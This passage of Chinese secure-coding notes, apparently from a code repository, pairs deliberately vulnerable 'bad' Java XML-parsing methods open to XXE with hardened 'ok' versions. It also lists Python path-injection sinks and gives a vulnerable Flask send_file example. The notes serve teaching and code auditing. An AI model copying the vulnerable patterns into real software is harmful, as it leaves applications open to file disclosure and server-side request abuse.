dom4j的SAXReader必须在SAXReader对象自身上调用setFeature关闭DOCTYPE/外部实体;另外单独配置一个SAXParserFactory对SAXReader没有任何作用。

```java
import org.dom4j.Document;
import org.dom4j.io.SAXReader;
import org.xml.sax.InputSource;

public void badSAXReader(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    SAXReader saxReader = new SAXReader();
    Document document = saxReader.read(new InputSource(servletInputStream)); //bad
}

public void okSAXReader(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    SAXReader saxReader = new SAXReader();
    saxReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    saxReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
    saxReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    saxReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    Document document = saxReader.read(new InputSource(servletInputStream));
}
```

## XMLReader XXE注入

```java
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.XMLReaderFactory;

public void badXMLReader(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    XMLReader reader = XMLReaderFactory.createXMLReader();
    reader.parse(new InputSource(servletInputStream)); //bad
}

public void okXMLReader(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    XMLReader reader = XMLReaderFactory.createXMLReader();
    reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
    reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    reader.parse(new InputSource(servletInputStream));
}
```

## Transformer XXE注入

```java
import javax.xml.transform.TransformerFactory;
import org.xml.sax.helpers.XMLReaderFactory;

public void badTransformer(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    TransformerFactory tf = TransformerFactory.newInstance();
    StreamSource source = new StreamSource(servletInputStream);
    tf.newTransformer().transform(source, new DOMResult()); //bad
}

public void okTransformer(HttpServletRequest request) throws Exception {
    ServletInputStream servletInputStream = request.getInputStream();
    TransformerFactory tf = TransformerFactory.newInstance();
    tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); 556 | StreamSource source = new StreamSource(servletInputStream); 557 | tf.newTransformer().transform(source, new DOMResult()); 558 | } 559 | ``` 560 | 561 | ## TransformerFactory XXE注入 562 | 563 | ```java 564 | import javax.xml.transform.TransformerFactory; 565 | 566 | public void badTransformerFactory(HttpServletRequest request) throws Exception { 567 | ServletInputStream servletInputStream = request.getInputStream(); 568 | //实际创建com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl对象 569 | TransformerFactory transformerFactory = TransformerFactory.newInstance(); 570 | transformerFactory.newTransformer(new StreamSource(servletInputStream)); 571 | } 572 | 573 | public void okTransformerFactory(HttpServletRequest request) throws Exception { 574 | ServletInputStream servletInputStream = request.getInputStream(); 575 | TransformerFactory transformerFactory = TransformerFactory.newInstance(); 576 | transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); 577 | transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); 578 | transformerFactory.newTransformer(new StreamSource(servletInputStream)); 579 | } 580 | ``` 581 | 582 | ## SAXTransformerFactory XXE注入 583 | 584 | ```java 585 | import javax.xml.transform.sax.SAXTransformerFactory; 586 | 587 | public void bad1SAXTransformerFactory(HttpServletRequest request) throws Exception { 588 | ServletInputStream servletInputStream = request.getInputStream(); 589 | //实际创建com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl对象 590 | SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance(); 591 | StreamSource source = new StreamSource(servletInputStream); 592 | sf.newTransformerHandler(source); 593 | } 594 | 595 | public void bad2SAXTransformerFactory(HttpServletRequest request) throws Exception { 596 | ServletInputStream servletInputStream = request.getInputStream(); 597 | 
//实际创建com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl对象 598 | SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance(); 599 | StreamSource source = new StreamSource(servletInputStream); 600 | sf.newTransformer(source); 601 | } 602 | 603 | public void bad3SAXTransformerFactory(HttpServletRequest request) throws Exception { 604 | ServletInputStream servletInputStream = request.getInputStream(); 605 | //实际创建com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl对象 606 | SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance(); 607 | StreamSource source = new StreamSource(servletInputStream); 608 | sf.newXMLFilter(source); 609 | } 610 | 611 | public void okSAXTransformerFactory(HttpServletRequest request) throws Exception { 612 | ServletInputStream servletInputStream = request.getInputStream(); 613 | SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance(); 614 | sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); 615 | sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); 616 | StreamSource source = new StreamSource(servletInputStream); 617 | sf.newTransformerHandler(source); 618 | } 619 | ``` 620 | 621 | 622 | ## SchemaFactory XXE注入 623 | 624 | ```java 625 | import javax.xml.validation.Schema; 626 | import javax.xml.validation.SchemaFactory; 627 | 628 | public void badSchemaFactory(HttpServletRequest request) throws Exception { 629 | ServletInputStream servletInputStream = request.getInputStream(); 630 | //实际创建com.sun.org.apache.xerces.internal.jaxp.validation.XMLSchemaFactory对象 631 | SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema"); 632 | StreamSource source = new StreamSource(servletInputStream); 633 | Schema schema = factory.newSchema(source); 634 | } 635 | 636 | public void okSchemaFactory(HttpServletRequest request) throws Exception { 637 | ServletInputStream servletInputStream = 
request.getInputStream(); 638 | SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema"); 639 | factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); 640 | factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); 641 | StreamSource source = new StreamSource(servletInputStream); 642 | Schema schema = factory.newSchema(source); 643 | } 644 | ``` 645 | 646 | ## Unmarshaller XXE注入 647 | 648 | Unmarshaller在jdk 1.8后修复了xxe注入 649 | 650 | ```java 651 | import javax.xml.bind.JAXBContext; 652 | import javax.xml.bind.Unmarshaller; 653 | 654 | public void badUnmarshaller(HttpServletRequest request) throws Exception { 655 | ServletInputStream servletInputStream = request.getInputStream(); 656 | JAXBContext jaxbContext = JAXBContext.newInstance(Test.class); 657 | Unmarshaller unmarshaller = jaxbContext.createUnmarshaller(); 658 | unmarshaller.unmarshal(servletInputStream); 659 | } 660 | 661 | 662 | Test.java 663 | 664 | import java.io.Serializable; 665 | import javax.xml.bind.annotation.XmlRootElement; 666 | 667 | @XmlRootElement(name="name") 668 | public class Test implements Serializable { 669 | 670 | private Integer id; 671 | 672 | private String name; 673 | 674 | private String pass; 675 | 676 | public Integer getId() { 677 | return id; 678 | } 679 | 680 | public void setId(Integer id) { 681 | this.id = id; 682 | } 683 | 684 | public String getName() { 685 | return name; 686 | } 687 | 688 | public void setName(String name) { 689 | this.name = name; 690 | } 691 | 692 | public String getPass() { 693 | return pass; 694 | } 695 | 696 | public void setPass(String pass) { 697 | this.pass = pass; 698 | } 699 | 700 | @Override 701 | public String toString() { 702 | return "Test{" + 703 | "id=" + id + 704 | ", name='" + name + '\'' + 705 | ", pass='" + pass + '\'' + 706 | '}'; 707 | } 708 | } 709 | 710 | ``` 711 | 712 | ## XPathExpression XXE注入 713 | 714 | 调用Document.parse(...)解析 715 | 716 | ```java 717 | import javax.xml.xpath.XPath; 718 | 
import javax.xml.xpath.XPathExpression; 719 | import javax.xml.xpath.XPathFactory; 720 | 721 | public void badXPathExpression(HttpServletRequest request) throws Exception { 722 | ServletInputStream servletInputStream = request.getInputStream(); 723 | XPath xPath = XPathFactory.newInstance().newXPath(); 724 | XPathExpression xPathExpression = xPath.compile("xxe"); 725 | xPathExpression.evaluate(new InputSource(servletInputStream)); 726 | } 727 | ``` 728 | 729 | ## Persister XXE注入 730 | 731 | ```pom 732 | 733 | org.simpleframework 734 | simple-xml 735 | 2.7.1 736 | 737 | ``` 738 | 739 | ```java 740 | import org.simpleframework.xml.core.Persister; 741 | 742 | public void badPersister(HttpServletRequest request) throws Exception { 743 | ServletInputStream servletInputStream = request.getInputStream(); 744 | Persister persister = new Persister(); 745 | persister.read("", servletInputStream); 746 | } 747 | ``` 748 | -------------------------------------------------------------------------------- /python/logInjection/note.md: -------------------------------------------------------------------------------- 1 | # Python日志注入 2 | -------------------------------------------------------------------------------- /python/pathInjection/note.md: -------------------------------------------------------------------------------- 1 | # Python路径注入 2 | 3 | 4 | sinks 5 | 6 | 7 | 文件读取 8 | ```python 9 | flask.send_file;Argument[0] # 读取文件 10 | fastapi.responses.FileResponse;Argument[0] # 读取文件 11 | ``` 12 | 13 | 文件删除 14 | ```python 15 | os.remove;Argument[0] # 删除文件 16 | os.unlink;Argument[0] # 删除文件 17 | os.removedirs;Argument[0] # 删除多级目录 18 | os.rmdir;Argument[0] # 删除目录 19 | shutil.rmtree;Argument[0] # 删除目录 20 | ``` 21 | 22 | 其他 23 | ```python 24 | os.open;Argument[0] # 该方法返回文件对象,可进行文件读取、写入、获取文件信息等操作 25 | os.chdir;Argument[0] # 将当前工作目录更改为指定路径 26 | os.renames;Argument[0, 1] # 将old文件夹或文件移动到new文件夹或文件 27 | os.rename;Argument[0, 1] # 将src文件夹或文件移动到dst文件夹或文件 28 | os.replace;Argument[0, 1] # 
将文件或目录src重命名为dst 29 | os.scandir;Argument[0] # 返回目录中的条目 30 | os.listdir;Argument[0] # 返回目录中的条目 31 | os.stat;Argument[0] # 获取文件或文件描述符的状态 32 | os.lstat;Argument[0] # 获取文件或文件描述符的状态 33 | os.truncate;Argument[0] # 截断文件为指定长度 34 | os.makedirs;Argument[0] # 递归创建文件夹 35 | os.mkdir;Argument[0] # 创建文件夹 36 | os.access;Argument[0] # 判断当前用户是否对指定文件有指定的访问权限,多用于判断文件访问权限后读取或写入文件 37 | os.chflags;Argument[0] # 将路径flags设置为目标flags, 例如:只读. 只支持在 Unix 下使用 38 | os.lchflags;Argument[0] # 将路径flags设置为目标flags. 只支持在 Unix 39 | os.chmod;Argument[0] # 将路径mode设置为目标mode, 例如:只读. 40 | os.lchmod;Argument[0] # 将路径mode设置为目标mode. 只支持在 Unix 41 | os.chown;Argument[0] # 将路径的所有者和组 ID 更改为数字uid和gid. 只支持在 Unix 42 | os.chroot;Argument[0] # 将当前进程的根目录更改为path. 只支持在 Unix 43 | os.lchown;Argument[0] # 将路径的所有者和组ID更改为数字uid和gid. 只支持在 Unix 44 | os.link;Argument[0, 1] # 创建一个名为dst、指向src的硬链接. 支持Unix、Windows 45 | os.mkfifo;Argument[0] # 创建命名管道(FIFO)文件 46 | os.pathconf;Argument[0] # 返回文件指定配置信息 47 | ``` 48 | 49 | 50 | 示例 51 | 52 | ```python 53 | from flask import Flask, send_file 54 | 55 | app = Flask(__name__) 56 | 57 | @app.route('/<path:path>') 58 | def hello_world(path): 59 | return send_file(path) 60 | 61 | 62 | if __name__ == '__main__': 63 | app.run() 64 | ``` 65 | 66 | 修复(secure_filename只在文件名级别做净化,如去掉路径分隔符和`..`;更稳妥的做法是把净化后的文件名限定在固定的基目录下再返回,例如使用flask.send_from_directory) 67 | 68 | ```python 69 | from werkzeug.utils import secure_filename 70 | from flask import Flask, send_file 71 | 72 | app = Flask(__name__) 73 | 74 | @app.route('/<path:path>') 75 | def hello_world(path): 76 | path = secure_filename(path) 77 | return send_file(path) 78 | 79 | 80 | if __name__ == '__main__': 81 | app.run() 82 | ``` 83 | --------------------------------------------------------------------------------